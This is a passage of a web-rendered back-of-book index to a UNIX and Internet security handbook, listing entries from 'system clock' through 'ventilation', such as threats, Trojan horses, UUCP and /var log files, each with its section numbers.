24.2.6. Anatomy of a Break-in<br />

dual universes and : 5.9.1. Dual Universes<br />

errors by : 7.1.1.1. A taxonomy of computer failures<br />

finding largest files : 25.2.2.1. Disk-full attacks<br />

immutable files and : 9.1.1. Immutable and Append-Only Files<br />

locked accounts : 3.3. Entering Your Password<br />

message authentication : 6.5.2. Using Message Digests<br />

monitoring phantom mail : 17.3.4.2. Using sendmail to receive email<br />

new passwords : 3.4. Changing Your Password<br />

read-only filesystems and : 9.1.2. Read-only Filesystems<br />

references on : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

removing automatic backups : 18.2.3.5. Beware stray CGI scripts<br />

sanitizing media : 12.3.2.3. Sanitize your media before disposal<br />

trusting : 27.3.2. Your System Administrator?<br />

weakness-finding tools : 11.1.1. <strong>Sec</strong>urity Tools<br />

system call : 5.1.7. File Permissions in Detail<br />

system clock<br />

changing<br />

5.1.5. File Times<br />

9.2.3. Checksums and Signatures<br />

17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

for random seeds : 23.8. Picking a Random Seed<br />

<strong>Sec</strong>ure RPC timestamp : 19.3.1.3. Setting the window<br />

system files : 11.6.1.2. Writable system files and directories<br />

initialization files : 11.5.3.5. System initialization files<br />

system function<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

system functions, checking arguments to : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

System Network Architecture (SNA) : 16.4.2. SNA<br />

System V <strong>UNIX</strong><br />

Which <strong>UNIX</strong> System?<br />

1.3. History of <strong>UNIX</strong><br />

accounting with : 10.2.1. Accounting with System V<br />

chroot in : 8.1.5. Restricted Filesystem<br />

default umask value : 5.3. The umask<br />

groups and : 4.1.3.2. Groups and older AT&T <strong>UNIX</strong><br />

inittab program : C.5.1. Process #1: /etc/init<br />

modems and : 14.5.1. Hooking Up a Modem to Your Computer<br />

passwords : 8.1.1. Accounts Without Passwords<br />

ps command with : C.1.2.1. Listing processes with systems derived from System V<br />

random number generators : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

recent login times : 10.1.1. lastlog File<br />

Release 4 (SVR4) : 1.3. History of <strong>UNIX</strong><br />

restricted shells : 8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

SGID bit on files : 5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

su command and : 4.3.6. Restricting su<br />

SUID files, list of : B.3. SUID and SGID Files<br />

utmp and wtmp files : 10.1.2. utmp and wtmp Files<br />

UUCP : 15.4.1.3. Format of USERFILE entry without system name<br />

/var/adm/loginlog file : 10.1.4. loginlog File<br />

wtmpx file : 10.1.2. utmp and wtmp Files<br />

Systems file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

Index: T<br />

table objects (NIS+) : 19.5.3. NIS+ Tables<br />

TACACS : 17.3.5. TACACS (UDP Port 49)<br />

tainting<br />

18.2.3.4. Tainting with Perl<br />

23.4. Tips on Writing SUID/SGID Programs<br />

taintperl<br />

5.5.3. SUID Shell Scripts<br />

18.2.3.4. Tainting with Perl<br />

23.4. Tips on Writing SUID/SGID Programs<br />

talk program : 11.1.4. Trojan Horses<br />

tandem backup : 7.1.4. Guarding Against Media Failure<br />

tar program<br />

6.6.1.2. Ways of improving the security of crypt<br />

7.3.2. Building an Automatic Backup System<br />

7.4.2. Simple Archives<br />

7.4.4. Encrypting Your Backups<br />

24.2.6. Anatomy of a Break-in<br />

Taylor UUCP : 15.2. Versions of UUCP<br />

TCB (trusted computing base) : 8.5.3.2. Trusted computing base<br />

/tcb directory : 8.1.1. Accounts Without Passwords<br />

tcov tester : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

TCP (Transmission Control Protocol)<br />

16.2.4.2. TCP<br />

TCP/IP<br />

1.4.3. Add-On Functionality Breeds Problems<br />

10.5.2.2. Logging across the network<br />

17.1.3. The /etc/inetd Program<br />

(see also network services; networks)<br />

checklist for<br />

A.1.1.15. Chapter 16: TCP/IP Networks<br />

A.1.1.16. Chapter 17: TCP/IP Services<br />

connections, clogging : 25.3.4. Clogging<br />

network services : (see network services)<br />

networks<br />

16. TCP/IP Networks<br />

16.5. Summary<br />

tcpwrapper program<br />

17.2. Controlling Access to Servers<br />

E.4.10. tcpwrapper<br />

tcsh<br />

11.5.1. Shell Features<br />

(see also shells)<br />

history file : 10.4.1. Shell History<br />

telecommunications : 26.2.2. Federal Jurisdiction<br />

telephone<br />

14.3.1. Originate and Answer<br />

(see also modems)<br />

calls, recording outgoing : 10.3.1. aculog File<br />

cellular : 12.2.1.8. Electrical noise<br />

checklist for : A.1.1.13. Chapter 14: Telephone <strong>Sec</strong>urity<br />

hang-up signal : (see signals)<br />

lines : 14.5.4. Physical Protection of Modems<br />

leasing : 14.5.4. Physical Protection of Modems<br />

one-way : 14.4.1. One-Way Phone Lines<br />

physical security of : 14.5.4. Physical Protection of Modems<br />

Telnet versus : 17.3.3. TELNET (TCP Port 23)<br />

Telnet utility<br />

3.5. Verifying Your New Password<br />

16.2.5. Clients and Servers<br />

17.3.3. TELNET (TCP Port 23)<br />

versus rlogin : 17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

telnetd program : 11.1.2. Back Doors and Trap Doors<br />

temperature : 12.2.1.6. Temperature extremes<br />

TEMPEST system : 12.3.1.3. Eavesdropping by radio and using TEMPEST<br />

terminal name and last command : 10.1.3. last Program<br />

terrorism : 12.2.5. Defending Against Acts of War and Terrorism<br />

testing<br />

CGI scripts : 18.2.3.2. Testing is not enough!<br />

core files and : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

programs : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

software : 1.4.2. Software Quality<br />

TFTP (Trivial File Transfer Protocol) : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

tftpd server : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

theft<br />

7.1.1.1. A taxonomy of computer failures<br />

12.2.6. Preventing Theft<br />

12.2.6.4. Minimizing downtime<br />

12.4.1.2. Potential for eavesdropping and data theft<br />

of backups<br />

12.3.2. Protecting Backups<br />

12.3.2.4. Backup encryption<br />

of RAM chips : 12.2.6. Preventing Theft<br />

thieves : 11.3. Authors<br />

third-party billing : 14.5.4. Physical Protection of Modems<br />

Thompson, Ken<br />

1.3. History of <strong>UNIX</strong><br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

threats<br />

assessing cost of : 2.3.3. Adding Up the Numbers<br />

back doors : (see back doors)<br />

to backups<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

bacteria programs : 11.1.7. Bacteria and Rabbits<br />

biological : 12.2.1.7. Bugs (biological)<br />

broadcast storms : 25.3.2. Message Flooding<br />

via CGI scripts : 18.2.3.2. Testing is not enough!<br />

changing file owners : 5.7. chown: Changing a File's Owner<br />

changing system clock : 5.1.5. File Times<br />

code breaking<br />

6.1.1. Code Making and Code Breaking<br />

(see also cryptography)<br />

commonly attacked accounts : 8.1.2. Default Accounts<br />

computer failures : 7.1.1.1. A taxonomy of computer failures<br />

decode aliases : 17.3.4.2. Using sendmail to receive email<br />

deep tree structures : 25.2.2.8. Tree-structure attacks<br />

denial of service<br />

17.1.3. The /etc/inetd Program<br />

17.3.21.5. Denial of service attacks under X<br />

25. Denial of Service Attacks and Solutions<br />

25.3.4. Clogging<br />

accidental : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

checklist for : A.1.1.24. Chapter 25: Denial of Service Attacks and Solutions<br />

destructive attacks : 25.1. Destructive Attacks<br />

disk attacks<br />

25.2.2. Disk Attacks<br />

25.2.2.8. Tree-structure attacks<br />

overload attacks<br />

25.2. Overload Attacks<br />

25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

system overload attacks : 25.2.1.2. System overload attacks<br />

disposed materials : 12.3.3. Other Media<br />

DNS client flooding : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

DNS nameserver attacks : 17.3.6.2. DNS nameserver attacks<br />

DNS zone transfers : 17.3.6.1. DNS zone transfers<br />

dormant accounts<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

false syslog entries : 10.5.3.1. Beware false log entries<br />

filename attacks : 11.5.1.4. Filename attacks<br />

hidden space : 25.2.2.7. Hidden space<br />

HOME variable attacks : 11.5.1.3. $HOME attacks<br />

identifying and quantifying<br />

2.2.1.2. Identifying threats<br />

2.2.2. Review Your Risks<br />

IFS variable attacks : 11.5.1.2. IFS attacks<br />

intruders : (see intruders)<br />

letting in accidentally : 11.4. Entry<br />

logic bombs<br />

11.1.3. Logic Bombs<br />

27.2.2. Viruses on the Distribution Disk<br />

mailing list for : E.1.3.9. RISKS<br />

media failure : 7.1.4. Guarding Against Media Failure<br />

meet-in-the-middle attacks : 6.4.5.1. Double DES<br />

MUD/IRC client programs : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

newly created accounts : 24.4.1. New Accounts<br />

NIS, unintended disclosure : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

with NNTP : 17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

open (guest) accounts<br />

8.1.4. Open Accounts<br />

8.1.4.6. Potential problems with rsh<br />

PATH variable attacks : 11.5.1.1. PATH attacks<br />

plaintext attacks : 6.2.3. Cryptographic Strength<br />

playback (replay) attacks : 19.6.1.2. Using the ticket granting ticket<br />

programmed<br />

11. Protecting Against Programmed Threats<br />

11.6.2. Shared Libraries<br />

A.1.1.10. Chapter 11: Protecting Against Programmed Threats<br />

D.1.4. Computer Viruses and Programmed Threats<br />

authors of : 11.3. Authors<br />

damage from : 11.2. Damage<br />

replay attacks : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

rsh, problems with : 8.1.4.6. Potential problems with rsh<br />

sendmail problems : 17.3.4.1. sendmail and security<br />

spoofed network connection : 8.5.3.1. Trusted path<br />

start-up file attacks<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

system clock : (see system clock)<br />

theft : (see theft)<br />

/tmp directory attacks : 25.2.4. /tmp Problems<br />

toll fraud : 14.4.1. One-Way Phone Lines<br />

traffic analysis : 18.4. Avoiding the Risks of Eavesdropping<br />

tree-structure attacks : 25.2.2.8. Tree-structure attacks<br />

Trojan horses<br />

4.3.5. Using su with Caution<br />

11.1.4. Trojan Horses<br />

11.5. Protecting Yourself<br />

17.3.21.2. X security<br />

19.6.5. Kerberos Limitations<br />

27.2.2. Viruses on the Distribution Disk<br />

trusted hosts : (see trusted, hosts)<br />

unattended terminals<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

unowned files : 24.4.1.8. Unowned files<br />

vandalism<br />

12.2.4. Vandalism<br />

12.2.4.3. Network connectors<br />

viruses<br />

11.1.5. Viruses<br />

(see viruses)<br />

war and terrorism : 12.2.5. Defending Against Acts of War and Terrorism<br />

weakness-finding tools : 11.1.1. <strong>Sec</strong>urity Tools<br />

by web browsers<br />

18.5. Risks of Web Browsers<br />

18.5.2. Trusting Your Software Vendor<br />

worms : 11.1.6. Worms<br />

three-way handshake (TCP) : 16.2.4.2. TCP<br />

ticket-granting service<br />

19.6.1.1. Initial login<br />

19.6.1.2. Using the ticket granting ticket<br />

19.6.1.3. Authentication, data integrity, and secrecy<br />

tickets : (see Kerberos system)<br />

Tiger : E.4.11. Tiger<br />

tilde (~)<br />

in automatic backups : 18.2.3.5. Beware stray CGI scripts<br />

as home directory : 11.5.1.3. $HOME attacks<br />

~! in mail messages : 8.1.3. Accounts That Run a Single Command<br />

time<br />

19.3.1.3. Setting the window<br />

(see also NTP; system clock)<br />

CPU, accounting<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.3. messages Log File<br />

defining random seed by : 23.8. Picking a Random Seed<br />

modification<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

7.4.7. inode Modification Times<br />

9.2.2. Checklists and Metadata<br />

24.5.1. Never Trust Anything Except Hardcopy<br />

most recent login : 10.1.1. lastlog File<br />

<strong>Sec</strong>ure RPC window of : 19.3.1.3. Setting the window<br />

timeouts<br />

11.1.3. Logic Bombs<br />

23.3. Tips on Writing Network Programs<br />

timesharing<br />

19.6.5. Kerberos Limitations<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Timezone table (NIS+) : 19.5.3. NIS+ Tables<br />

tip command<br />

10.3.1. aculog File<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.1. Originate testing<br />

14.5.3.3. Privilege testing<br />

-l option : 14.5.3.1. Originate testing<br />

TIS <strong>Internet</strong> Firewall Toolkit (FWTK) : E.4.12. TIS <strong>Internet</strong> Firewall Toolkit<br />

TMOUT variable : 12.3.5.1. Built-in shell autologout<br />

/tmp directory<br />

14.5.3.3. Privilege testing<br />

25.2.4. /tmp Problems<br />

tmpfile function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

token cards : 8.7.2. Token Cards<br />

token ring : 16.1. Networking<br />

toll fraud : 14.4.1. One-Way Phone Lines<br />

tools : 1.3. History of <strong>UNIX</strong><br />

to find weaknesses : 11.1.1. <strong>Sec</strong>urity Tools<br />

quality of<br />

1.4.2. Software Quality<br />

1.4.3. Add-On Functionality Breeds Problems<br />

Totient Function : 6.4.6.1. How RSA works<br />

tracing connections<br />

24.2.4. Tracing a Connection<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

trademarks : 26.4.3. Trademark Violations<br />

traffic analysis : 18.4. Avoiding the Risks of Eavesdropping<br />

training : 13.2.1. Initial Training<br />

transfer zones : 16.2.6.1. DNS under <strong>UNIX</strong><br />

transferring files : 15.1.1. uucp Command<br />

Transmission Control Protocol (TCP) : 16.2.4.2. TCP<br />

Transmit Data (TD) : 14.3. The RS-232 Serial Protocol<br />

transmitters, radio : 12.2.1.8. Electrical noise<br />

transposition (in encryption) : 6.1.2. Cryptography and Digital Computers<br />

trap doors : (see back doors)<br />

trashing : 12.3.3. Other Media<br />

tree structures : 25.2.2.8. Tree-structure attacks<br />

trimlog : E.4.13. trimlog<br />

Triple DES<br />

6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

6.4.5.2. Triple DES<br />

Tripwire package<br />

9.2.4. Tripwire<br />

9.2.4.2. Running Tripwire<br />

19.5.5. NIS+ Limitations<br />

E.4.14. Tripwire<br />

Trivial File Transfer Protocol (TFTP) : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

Trojan horses<br />

4.3.5. Using su with Caution<br />

11.1.4. Trojan Horses<br />

11.5. Protecting Yourself<br />

27.2.2. Viruses on the Distribution Disk<br />

Kerberos and : 19.6.5. Kerberos Limitations<br />

X clients : 17.3.21.2. X security<br />

truncate system call : 5.1.7. File Permissions in Detail<br />

trust<br />

1.1. What Is Computer <strong>Sec</strong>urity?<br />

2.1.1. Trust<br />

27. Who Do You Trust?<br />

27.4. What All This Means<br />

of log files : 10.8. Managing Log Files<br />

trusted<br />

8.5.3.2. Trusted computing base<br />

17.1.1. The /etc/services File<br />

hosts<br />

17.3.18.1. Trusted hosts and users<br />

17.3.18.4. The ~/.rhosts file<br />

NFS and : 17.3.18.2. The problem with trusted hosts<br />

path : 8.5.3.1. Trusted path<br />

ports : 1.4.3. Add-On Functionality Breeds Problems<br />

users<br />

17.3.4.1. sendmail and security<br />

17.3.18.1. Trusted hosts and users<br />

TRW Network Area and System Administrators : F.3.4.36. TRW network area and system administrators<br />

tty file : 7.1.2. What Should You Back Up?<br />

ttymon program : C.5.2. Logging In<br />

ttys file<br />

8.5.1. <strong>Sec</strong>ure Terminals<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

ttytab file : C.5.1. Process #1: /etc/init<br />

ttywatch program : 24.2.3. Monitoring the Intruder<br />

tunefs command : 25.2.2.6. Reserved space<br />

tunneling : 16.4.1. IPX<br />

twisted pair : 16.1. Networking<br />

TZ variable : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Index: U<br />

U.S. Department of Energy : F.3.4.12. France: universities, Ministry of Research and Education in France, CNRS, CEA, INRIA, CNES, INRA, IFREMER, and EDF<br />

U.S. Department of the Navy : F.3.4.44. U.S. Department of the Navy<br />

U.S. law : (see laws)<br />

U.S. <strong>Sec</strong>ret Service<br />

26.2.2. Federal Jurisdiction<br />

F.3.3. U.S. <strong>Sec</strong>ret Service (USSS)<br />

UDP (User Datagram Protocol)<br />

16.2.4.3. UDP<br />

17.1.3. The /etc/inetd Program<br />

(see also network services)<br />

packet relayer : E.4.15. UDP Packet Relayer<br />

ufsdump : (see dump/restore program)<br />

UIDs (user identifiers)<br />

4.1. Users and Groups<br />

4.1.2. Multiple Accounts with the Same UID<br />

real versus effective<br />

4.3.1. Real and Effective UIDs<br />

C.1.3.2. Process real and effective UID<br />

RPC requests and : 19.2.2.2. AUTH_<strong>UNIX</strong><br />

su command and : 10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

of web servers : 18.2.1. The Server's UID<br />

zero : (see root account; superuser)<br />

UK Defense Research Agency : F.3.4.37. UK: Defense Research Agency<br />

ulimit command : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

Ultrix : 1.3. History of <strong>UNIX</strong><br />

trusted path : 8.5.3.1. Trusted path<br />

UUCP : 15.4.1.3. Format of USERFILE entry without system name<br />

umask<br />

5.3. The umask<br />

5.3.2. Common umask Values<br />

8.4.3. Finding Dormant Accounts<br />

unattended terminals<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

uninterruptible power supply (UPS)<br />

2.2. Risk Assessment<br />

12.2.1.1. Fire<br />

Unisys : F.3.4.39. UK: other government departments and agencies<br />

universes : 5.9.1. Dual Universes<br />

<strong>UNIX</strong> : 1. Introduction<br />

add-on functionality of : 1.4.3. Add-On Functionality Breeds Problems<br />

conventional passwords : 3.2.6. Conventional <strong>UNIX</strong> Passwords<br />

DAC (Discretionary Access Controls) : 4.1.3. Groups and Group Identifiers (GIDs)<br />

DNS under : 16.2.6.1. DNS under <strong>UNIX</strong><br />

encryption programs for<br />

6.6. Encryption Programs Available for <strong>UNIX</strong><br />

6.6.3.6. PGP detached signatures<br />

filesystem<br />

5. The <strong>UNIX</strong> Filesystem<br />

5.10. Summary<br />

history of : 1.3. History of <strong>UNIX</strong><br />

modems and<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.3. Privilege testing<br />

networking and : 16.1.2. Networking and <strong>UNIX</strong><br />

operating systems : (see operating systems)<br />

primary network services<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

process scheduler : C.1.3.3. Process priority and niceness<br />

processes : (see processes)<br />

programming references : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

published resources for : D.1. <strong>UNIX</strong> <strong>Sec</strong>urity References<br />

security and<br />

1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

1.4.3. Add-On Functionality Breeds Problems<br />

signals : C.3. Signals<br />

starting up<br />

C.5. Starting Up <strong>UNIX</strong> and Logging In<br />

C.5.3. Running the User's Shell<br />

Version 6 : 1.3. History of <strong>UNIX</strong><br />

viruses : (see viruses)<br />

web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

unlinked files : 25.2.2.7. Hidden space<br />

unowned files : 24.4.1.8. Unowned files<br />

unplugging connections : 24.2.5. Getting Rid of the Intruder<br />

unpredictability of randomness : 23.6. Tips on Generating Random Numbers<br />

upgrades, logging : 10.7.2.1. Exception and activity reports<br />

uploading stored information : 12.3.4. Protecting Local Storage<br />

UPS (uninterruptible power supply)<br />

2.2. Risk Assessment<br />

12.2.1.1. Fire<br />

uptime command : 8.1.3. Accounts That Run a Single Command<br />

urandom device : 23.7.4. Other random number generators<br />

Usenet<br />

17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

E.2. Usenet Groups<br />

(see also NNTP)<br />

cleanup scripts : 11.5.3. Abusing Automatic Mechanisms<br />

encryption for : (see ROT13 algorithm)<br />

posting breakins to : 24.6. Resuming Operation<br />

reporting security holes on : 2.5.1. Going Public<br />

User Datagram Protocol (UDP) : 16.2.4.3. UDP<br />

user error : 7.1.1.1. A taxonomy of computer failures<br />

user IDs : (see UIDs)<br />

USERFILE file (UUCP)<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

usermod command<br />

-e option : 8.4.3. Finding Dormant Accounts<br />

-f option : 8.4.3. Finding Dormant Accounts<br />

-s option : 8.3. Restricting Logins<br />

usernames : 3.1. Usernames<br />

users<br />

aliases for : 8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

doubling as passwords (Joes) : 3.6.2. Smoking Joes<br />

last command and : 10.1.3. last Program<br />

as passwords : 8.8.3.1. Joetest: a simple password cracker<br />

special<br />

4.2. Special Usernames<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

using someone else's<br />

4.3. su: Changing Who You Claim to Be<br />

4.3.8. Other Uses of su<br />

4. Users, Groups, and the Superuser<br />

4.1. Users and Groups<br />

4.1.2. Multiple Accounts with the Same UID<br />

(see also groups; su command)<br />

assigning passwords to : 8.8.1. Assigning Passwords to Users<br />

auditing who is logged in<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

authentication for Web : 18.3.3. Setting Up Web Users and Passwords<br />

becoming other<br />

4.3. su: Changing Who You Claim to Be<br />

4.3.8. Other Uses of su<br />

checklist for : A.1.1.2. Chapter 3: Users and Passwords<br />

dormant accounts and<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

identifiers for : (see UIDs)<br />

importing to NIS server<br />

19.4.1. Including or excluding specific accounts:<br />

19.4.4.2. Using netgroups to limit the importing of accounts<br />

letting in threats : 11.4. Entry<br />

limited : 8.1.5.1. Limited users<br />

logging<br />

10.4. Per-User Trails in the Filesystem<br />

10.4.3. Network Setup<br />

NIS passwords for : 19.3.2.1. Creating passwords for users<br />

nobody (<strong>Sec</strong>ure RPC) : 19.3.2.1. Creating passwords for users<br />

notifying about monitoring : 26.2.6. Other Tips<br />

proving identity of : 19.3.1.1. Proving your identity<br />

recognizing as intruders<br />

24.2. Discovering an Intruder<br />

24.2.6. Anatomy of a Break-in<br />

restricting certain : 18.3. Controlling Access to Files on Your Server<br />

root : (see root account; superuser)<br />

sending messages to : 10.5.1. The syslog.conf Configuration File<br />

summarizing system usage by : 25.2.2.2. quot command<br />

tainting : 18.2.3.4. Tainting with Perl<br />

training : 13.2.1. Initial Training<br />

UIDs : (see UIDs)<br />

unattended terminals<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

USERFILE entries for : 15.4.1.2. USERFILE entries for local users<br />

www : 18.2.2. Understand Your Server's Directory Structure<br />

users command<br />

10.1.2. utmp and wtmp Files<br />

24.2.1. Catching One in the Act<br />

USG (<strong>UNIX</strong> Support Group) : 1.3. History of <strong>UNIX</strong><br />

/usr directory<br />

4.3.7. The Bad su Log<br />

(see also /var directory)<br />

backing up /usr/bin : 7.1.2. What Should You Back Up?<br />

/usr/adm directory : 11.5.3.6. Other files<br />

/usr/adm/lastlog file : 10.1.1. lastlog File<br />

/usr/adm/messages file : 10.2.3. messages Log File<br />

/usr/bin directory<br />

11.1.5. Viruses<br />

11.5.1.1. PATH attacks<br />

/usr/bin/uudecode : (see uudecode program)<br />

/usr/etc/yp/makedbm program : 19.4.4.1. Setting up netgroups<br />

/usr/lib/aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

/usr/lib directory : 11.5.3.6. Other files<br />

in restricted filesystems : 8.1.5. Restricted Filesystem<br />

/usr/lib/preserve program : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

/usr/lib/sendmail : (see sendmail)<br />

/usr/lib/uucp/Devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

/usr/lib/uucp directory<br />

15.4.2.1. Some bad examples<br />

15.5.2. Permissions Commands<br />

/usr/lib/uucp/L-devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

/usr/lib/uucp/L.cmds file : (see L.cmds file)<br />

/usr/lib/uucp/L.sys file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

/usr/lib/uucp/Permissions file : (see Permissions file)<br />

/usr/lib/uucp/Systems file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

/usr/lib/uucp/USERFILE file<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

/usr/local/bin : 1.1. What Is Computer <strong>Sec</strong>urity?<br />

/usr/local/bin directory : 11.5.1.1. PATH attacks<br />

/usr/local/etc/http/logs directory : 10.3.5. access_log Log File<br />

/usr/local/lib directory : 11.5.3.6. Other files<br />

/usr/sbin/rexecd : (see rexec service)<br />

/usr/spool/cron/crontabs directory : 15.6.2. Automatic Execution of Cleanup Scripts<br />

/usr/spool/uucp directory : 15.1.4. How the UUCP Commands Work<br />

/usr/spool/uucppublic : (see uucppublic directory)<br />

/usr/ucb directory : 11.1.5. Viruses<br />

utility programs : 1.2. What Is an Operating System?<br />

utimes command : 24.5.1. Never Trust Anything Except Hardcopy<br />

utmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

uucheck program : 15.5.3. uucheck: Checking Your Permissions File<br />

uucico program<br />

15.1.4. How the UUCP Commands Work<br />

15.3. UUCP and <strong>Sec</strong>urity<br />

15.5.1.1. Starting up<br />

uucp (user)<br />

4.1. Users and Groups<br />

4.2.2. Other Special Users<br />

uucp command : 15.1.1. uucp Command<br />

UUCP system<br />

4.1.2. Multiple Accounts with the Same UID<br />

14.5. Modems and <strong>UNIX</strong><br />

15. UUCP<br />

15.9. Summary<br />

additional logins : 15.3.1. Assigning Additional UUCP Logins<br />

BNU<br />

15.2. Versions of UUCP<br />

15.5. <strong>Sec</strong>urity in BNU UUCP<br />

15.5.3. uucheck: Checking Your Permissions File<br />

checklist for : A.1.1.14. Chapter 15: UUCP<br />

cleanup scripts<br />

11.5.3. Abusing Automatic Mechanisms<br />

15.6.2. Automatic Execution of Cleanup Scripts<br />

early security problems : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

HoneyDanBer (HDB) : 15.2. Versions of UUCP<br />

logging : 10.3.4. uucp Log Files<br />

mail forwarding : 15.6.1. Mail Forwarding for UUCP<br />

naming computer : 15.5.2. Permissions Commands<br />

over networks : 15.8. UUCP Over Networks<br />

NFS server and : 15.3. UUCP and <strong>Sec</strong>urity<br />

passwords for : 15.3.2. Establishing UUCP Passwords<br />

Taylor : 15.2. Versions of UUCP<br />

over TCP : 17.3.20. UUCP over TCP (TCP Port 540)<br />

Version 2<br />

15.2. Versions of UUCP<br />

15.4. <strong>Sec</strong>urity in Version 2 UUCP<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

uucpa account : 15.3.1. Assigning Additional UUCP Logins<br />

uucpd program : 15.8. UUCP Over Networks<br />

uucppublic directory<br />

15.1.1. uucp Command<br />

15.4.1.3. Format of USERFILE entry without system name<br />

15.5.2. Permissions Commands<br />

uudecode program : 17.3.4.2. Using sendmail to receive email<br />

uuencode program : 6.6.1.2. Ways of improving the security of crypt<br />

uux command : 15.1.2. uux Command<br />

- (hyphen) option : 15.1.2. uux Command<br />

-r option : 15.1.4. How the UUCP Commands Work<br />

uuxqt program : 15.4.1.3. Format of USERFILE entry without system name<br />

uuxqtcmds files : 15.4.3. L.cmds: Providing Remote Command Execution<br />

Index: V<br />

vacuums, computer : 12.2.1.3. Dust<br />

VALIDATE= command : 15.5.2. Permissions Commands<br />

vampire taps : 12.3.1.5. Fiber optic cable<br />

vandalism<br />

7.1.1.1. A taxonomy of computer failures<br />

12.2.4. Vandalism<br />

12.2.4.3. Network connectors<br />

/var directory<br />

4.3.7. The Bad su Log<br />

9.1.2. Read-only Filesystems<br />

(see also /usr directory)<br />

/var/adm/acct : 10.2. The acct/pacct Process Accounting File<br />

/var/adm directory : 11.5.3.6. Other files<br />

/var/adm/lastlog file : 10.1.1. lastlog File<br />

/var/adm/loginlog file : 10.1.4. loginlog File<br />

/var/adm/messages : 10.2.3. messages Log File<br />

/var/adm/messages file : 4.3.7. The Bad su Log<br />

/var/adm/savacct : 10.2. The acct/pacct Process Accounting File<br />

/var/adm/sulog file : 4.3.7. The Bad su Log<br />

/var/adm/wtmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.3.1. Pruning the wtmp file<br />

/var/adm/xferlog : 10.3.3. xferlog Log File<br />

/var/log directory : 11.5.3.6. Other files<br />

/var/spool/uucp/.Admin directory : 10.3.4. uucp Log Files<br />

variables<br />

bounds checking : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

to CGI scripts : 18.2.3.1. Do not trust the user's browser!<br />

vendor liability : 18.5.2. Trusting Your Software Vendor<br />

vendors : 27.3.3. Your Vendor?<br />

ventilation<br />

12.2.1.10. Vibration<br />

(see also dust; smoke and smoking)<br />

air ducts : 12.2.3.2. Entrance through air ducts<br />

holes (in hardware) : 12.2.4.1. Ventilation holes<br />

